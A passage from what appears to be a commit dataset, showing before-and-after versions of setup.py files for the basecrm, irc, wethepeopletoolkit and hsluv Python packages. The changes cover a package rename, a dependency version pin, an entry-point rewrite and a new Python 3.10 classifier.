'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| <commit_before># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
<commit_msg>Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).<commit_after> | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).# -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| <commit_before># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
<commit_msg>Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).<commit_after># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
b4ff3790fcefe070d13efed01247e94cbe87bd43 | setup.py | setup.py | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| Use hgtools 5 or later for use_vcs_version | Use hgtools 5 or later for use_vcs_version
| Python | mit | jaraco/irc | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
Use hgtools 5 or later for use_vcs_version | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| <commit_before>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
<commit_msg>Use hgtools 5 or later for use_vcs_version<commit_after> | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
Use hgtools 5 or later for use_vcs_versionimport sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| <commit_before>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
<commit_msg>Use hgtools 5 or later for use_vcs_version<commit_after>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
|
76dc4637d41b7c32f00a0cc1ab0a8af9b463524d | setup.py | setup.py | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
) | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | Change how console_scripts is invoked | Change how console_scripts is invoked
| Python | mit | alexpeattie/wethepeopletoolkit | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)Change how console_scripts is invoked | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | <commit_before>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)<commit_msg>Change how console_scripts is invoked<commit_after> | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)Change how console_scripts is invokedfrom setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | <commit_before>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)<commit_msg>Change how console_scripts is invoked<commit_after>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) |
618138eaac7463b9e2afd6e8d28c2e27cf294f87 | setup.py | setup.py | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| Add official support for Python 3.10 | Add official support for Python 3.10
| Python | mit | hsluv/hsluv-python,husl-colors/husl.py | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
Add official support for Python 3.10 | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| <commit_before>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
<commit_msg>Add official support for Python 3.10<commit_after> | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
